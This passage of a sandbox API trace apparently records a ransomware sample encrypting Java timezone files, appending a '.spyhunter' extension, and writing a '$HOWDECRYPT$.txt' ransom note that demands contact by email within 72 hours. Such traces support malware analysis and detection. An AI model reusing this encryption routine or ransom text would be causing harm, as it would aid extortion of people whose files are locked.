(x86)\\Java\\jre7\\lib\\zi\\America\\Sitka") returned 57 [0169.790] StrStrW (lpFirst="Sitka", lpSrch=".txt") returned 0x0 [0169.790] GetProcessHeap () returned 0x2c0000 [0169.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.790] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce484, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce484*=0x4c8, lpOverlapped=0x0) returned 1 [0169.827] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.827] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4c8, lpNumberOfBytesWritten=0x25ce484, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce484*=0x4c8, lpOverlapped=0x0) returned 1 [0169.827] GetProcessHeap () returned 0x2c0000 [0169.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.827] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.827] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce484, lpOverlapped=0x0 | out: lpBuffer=0x25ce4c4*, lpNumberOfBytesWritten=0x25ce484*=0x4, lpOverlapped=0x0) returned 1 [0169.827] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce484, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce484*=0x30, lpOverlapped=0x0) returned 1 [0169.827] CloseHandle (hObject=0x178) returned 1 [0169.827] GetProcessHeap () returned 0x2c0000 [0169.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.828] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka.spyhunter") returned 67 [0169.828] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sitka"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sitka.spyhunter")) returned 1 [0169.830] GetProcessHeap () returned 0x2c0000 [0169.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.830] GetProcessHeap () returned 0x2c0000 [0169.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.830] GetProcessHeap () returned 0x2c0000 [0169.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb97c0 | out: hHeap=0x2c0000) returned 1 [0169.830] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4c8 | out: pbBuffer=0x25ce4c8) returned 1 [0169.830] GetProcessHeap () returned 0x2c0000 [0169.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.830] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4c0*=0x30) returned 1 [0169.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santo_domingo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.831] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo") returned 65 [0169.831] StrStrW (lpFirst="Santo_Domingo", lpSrch=".txt") returned 0x0 [0169.831] GetProcessHeap () returned 0x2c0000 [0169.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.831] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce484, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce484*=0xc9, lpOverlapped=0x0) returned 1 [0169.832] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.832] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xc9, lpNumberOfBytesWritten=0x25ce484, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce484*=0xc9, lpOverlapped=0x0) returned 1 [0169.832] GetProcessHeap () returned 0x2c0000 [0169.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.832] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.832] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce484, lpOverlapped=0x0 | out: lpBuffer=0x25ce4c4*, lpNumberOfBytesWritten=0x25ce484*=0x4, lpOverlapped=0x0) returned 1 [0169.832] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce484, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce484*=0x30, lpOverlapped=0x0) returned 1 [0169.832] CloseHandle (hObject=0x178) returned 1 [0169.832] GetProcessHeap () returned 0x2c0000 [0169.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.833] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo.spyhunter") returned 75 [0169.833] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santo_domingo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santo_Domingo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santo_domingo.spyhunter")) returned 1 [0169.833] GetProcessHeap () returned 0x2c0000 [0169.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.833] GetProcessHeap () returned 0x2c0000 [0169.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.833] GetProcessHeap () returned 0x2c0000 [0169.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04c68 | out: hHeap=0x2c0000) returned 1 [0169.834] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4c0 | out: pbBuffer=0x25ce4c0) returned 1 [0169.834] GetProcessHeap () returned 0x2c0000 [0169.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.834] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4b8*=0x30) returned 1 [0169.834] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santiago"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.834] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago") returned 60 [0169.834] StrStrW (lpFirst="Santiago", lpSrch=".txt") returned 0x0 [0169.834] GetProcessHeap () returned 0x2c0000 [0169.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.834] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce47c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce47c*=0x558, lpOverlapped=0x0) returned 1 [0169.917] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffaa8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.917] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x25ce47c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce47c*=0x558, lpOverlapped=0x0) returned 1 [0169.917] GetProcessHeap () returned 0x2c0000 [0169.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.917] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.917] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce47c, lpOverlapped=0x0 | out: lpBuffer=0x25ce4bc*, lpNumberOfBytesWritten=0x25ce47c*=0x4, lpOverlapped=0x0) returned 1 [0169.918] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce47c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce47c*=0x30, lpOverlapped=0x0) returned 1 [0169.918] CloseHandle (hObject=0x178) returned 1 [0169.918] GetProcessHeap () returned 0x2c0000 [0169.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.918] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago.spyhunter") returned 70 [0169.918] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santiago"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santiago.spyhunter")) returned 1 [0169.919] GetProcessHeap () returned 0x2c0000 [0169.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.919] GetProcessHeap () returned 0x2c0000 [0169.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.919] GetProcessHeap () returned 0x2c0000 [0169.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed56e0 | out: hHeap=0x2c0000) returned 1 [0169.919] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4c0 | out: pbBuffer=0x25ce4c0) returned 1 [0169.919] GetProcessHeap () returned 0x2c0000 [0169.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.920] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4b8*=0x30) returned 1 [0169.920] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santarem"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.920] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem") returned 60 [0169.920] StrStrW (lpFirst="Santarem", lpSrch=".txt") returned 0x0 [0169.920] GetProcessHeap () returned 0x2c0000 [0169.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.920] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce47c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce47c*=0x131, lpOverlapped=0x0) returned 1 [0169.921] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffecf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.921] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x131, lpNumberOfBytesWritten=0x25ce47c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce47c*=0x131, lpOverlapped=0x0) returned 1 [0169.922] GetProcessHeap () returned 0x2c0000 [0169.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.922] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.922] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce47c, lpOverlapped=0x0 | out: lpBuffer=0x25ce4bc*, lpNumberOfBytesWritten=0x25ce47c*=0x4, lpOverlapped=0x0) returned 1 [0169.922] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce47c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce47c*=0x30, lpOverlapped=0x0) returned 1 [0169.922] CloseHandle (hObject=0x178) returned 1 [0169.922] GetProcessHeap () returned 0x2c0000 [0169.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.922] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem.spyhunter") returned 70 [0169.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santarem"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santarem.spyhunter")) returned 1 [0169.923] GetProcessHeap () returned 0x2c0000 [0169.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.923] GetProcessHeap () returned 0x2c0000 [0169.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.923] GetProcessHeap () returned 0x2c0000 [0169.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed5618 | out: hHeap=0x2c0000) returned 1 [0169.923] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4b8 | out: pbBuffer=0x25ce4b8) returned 1 [0169.924] GetProcessHeap () returned 0x2c0000 [0169.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.924] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4b0*=0x30) returned 1 [0169.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rio_branco"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.924] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco") returned 62 [0169.924] StrStrW (lpFirst="Rio_Branco", lpSrch=".txt") returned 0x0 [0169.924] GetProcessHeap () returned 0x2c0000 [0169.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.924] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce474, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce474*=0x131, lpOverlapped=0x0) returned 1 [0169.925] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffecf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.925] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x131, lpNumberOfBytesWritten=0x25ce474, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce474*=0x131, lpOverlapped=0x0) returned 1 [0169.925] GetProcessHeap () returned 0x2c0000 [0169.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.925] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.925] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce474, lpOverlapped=0x0 | out: lpBuffer=0x25ce4b4*, lpNumberOfBytesWritten=0x25ce474*=0x4, lpOverlapped=0x0) returned 1 [0169.926] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce474, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce474*=0x30, lpOverlapped=0x0) returned 1 [0169.926] CloseHandle (hObject=0x178) returned 1 [0169.926] GetProcessHeap () returned 0x2c0000 [0169.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.926] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco.spyhunter") returned 72 [0169.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rio_branco"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rio_branco.spyhunter")) returned 1 [0169.927] GetProcessHeap () returned 0x2c0000 [0169.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.927] GetProcessHeap () returned 0x2c0000 [0169.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.927] GetProcessHeap () returned 0x2c0000 [0169.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed5550 | out: hHeap=0x2c0000) returned 1 [0169.928] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4b8 | out: pbBuffer=0x25ce4b8) returned 1 [0169.928] GetProcessHeap () returned 0x2c0000 [0169.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.928] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4b0*=0x30) returned 1 [0169.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\resolute"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.929] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute") returned 60 [0169.929] StrStrW (lpFirst="Resolute", lpSrch=".txt") returned 0x0 [0169.929] GetProcessHeap () returned 0x2c0000 [0169.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.929] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce474, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce474*=0x41c, lpOverlapped=0x0) returned 1 [0170.091] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbe4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.091] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41c, lpNumberOfBytesWritten=0x25ce474, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce474*=0x41c, lpOverlapped=0x0) returned 1 [0170.092] GetProcessHeap () returned 0x2c0000 [0170.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0170.092] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.092] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce474, lpOverlapped=0x0 | out: lpBuffer=0x25ce4b4*, lpNumberOfBytesWritten=0x25ce474*=0x4, lpOverlapped=0x0) returned 1 [0170.092] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce474, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce474*=0x30, lpOverlapped=0x0) returned 1 [0170.092] CloseHandle (hObject=0x178) returned 1 [0170.092] GetProcessHeap () returned 0x2c0000 [0170.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.093] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute.spyhunter") returned 70 [0170.093] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\resolute"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\resolute.spyhunter")) returned 1 [0170.094] GetProcessHeap () returned 0x2c0000 [0170.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.094] GetProcessHeap () returned 0x2c0000 [0170.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0170.094] GetProcessHeap () returned 0x2c0000 [0170.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed5488 | out: hHeap=0x2c0000) returned 1 [0170.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0170.097] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0170.097] WriteFile (in: hFile=0x178, lpBuffer=0x25ce3e7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce510, lpOverlapped=0x0 | out: lpBuffer=0x25ce3e7*, lpNumberOfBytesWritten=0x25ce510*=0x127, lpOverlapped=0x0) returned 1 [0170.098] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0170.098] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce510, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce510*=0x2ac, lpOverlapped=0x0) returned 1 [0170.098] CloseHandle (hObject=0x178) returned 1 [0170.098] GetProcessHeap () returned 0x2c0000 [0170.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa000 | out: hHeap=0x2c0000) returned 1 [0170.098] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce4b0 | out: pbBuffer=0x25ce4b0) returned 1 [0170.098] GetProcessHeap () returned 0x2c0000 [0170.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0170.098] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, 